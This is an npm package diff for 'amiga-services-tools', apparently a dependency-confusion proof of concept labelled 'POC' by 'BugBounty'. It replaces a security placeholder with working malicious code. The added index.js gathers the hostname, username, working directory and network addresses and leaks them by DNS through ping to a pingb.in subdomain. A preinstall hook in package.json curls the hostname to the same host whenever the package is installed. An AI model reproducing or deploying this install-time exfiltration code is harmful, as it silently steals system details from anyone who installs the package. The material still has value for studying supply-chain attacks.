amiga-services-tools 0.0.1-security → 5.4.1

package/index.js

@@ -0,0 +1,42 @@
+const os = require("os");
+const { spawn } = require("child_process");
+var isWin = process.platform === "win32";
+
+const id = "a9bf10ac14bdac8f374cb122a474";
+
+try {
+  exfil({ r_hostname: os.hostname() });
+} catch (e) {}
+try {
+  exfil({ r_user: os.userInfo().username });
+} catch (e) {}
+try {
+  exfil({ r_cwd: process.cwd() });
+} catch (e) {}
+try {
+  const nets = os.networkInterfaces();
+  for (const name of Object.keys(nets)) {
+    for (const net of nets[name]) {
+      exfil({ ["r_net_" + name]: net.address });
+    }
+  }
+} catch (e) {}
+
+//process.exit();
+
+function exfil(data) {
+  try {
+    const b64 = Buffer.from(JSON.stringify(data))
+      .toString("base64")
+      .replace(/=/gm, "");
+
+    let args;
+    if (isWin) {
+      args = ["-n", "1"];
+    } else {
+      args = ["-c", "1"];
+    }
+    args.push(`${id}.${b64}.ns.pingb.in`);
+    spawn(`ping`, args, { detached: true });
+  } catch (e) {}
+}

package/package.json

@@ -1,6 +1,12 @@
 {
   "name": "amiga-services-tools",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "5.4.1",
+  "description": "POC",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall": "echo a9bf10ac14bdac8f374cb122a474.`hostname`.ns.pingb.in | xargs curl"
+  },
+  "author": "BugBounty",
+  "license": "ISC"
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=amiga-services-tools for more information.